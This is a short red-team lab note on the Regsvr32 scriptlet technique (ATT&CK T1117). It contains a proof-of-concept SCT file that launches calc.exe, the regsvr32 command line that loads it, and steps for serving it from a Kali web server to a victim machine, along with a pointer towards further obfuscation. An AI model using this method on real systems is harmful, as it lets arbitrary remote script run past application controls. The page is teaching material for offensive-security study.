Regsvr32

ID: T1117 Tactic: Defense Evasion, Execution

This technique uses a SCT file loaded remotely.

SCT: Script used to create a Component Object Model (.COM) component, may be written in various scripting languages such as VBScript, JavaScript, or JScript; runs itself in Windows if the Windows Scripting Host is installed.

A very basic SCT file that will execute calc.exe :

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
		//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
		
		var scr = new ActiveXObject("MSScriptControl.ScriptControl");
		scr.Language = "JScript";
		scr.ExecuteStatement('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		scr.Eval('var r = new ActiveXObject("WScript.Shell").Run("calc.exe");');
		
		//https://msdn.microsoft.com/en-us/library/aa227637(v=vs.60).aspx
		//Lots of hints here on futher obfuscation
		]]></script>
</registration>
</scriptlet>

I will host this on my Kali box using python3

sudo python3 -m http.server 80

Now let's call it from our Victim Box.

And execute

Demo:

PreviousMSBuild NextWindows Remote Management

Last updated 4 years ago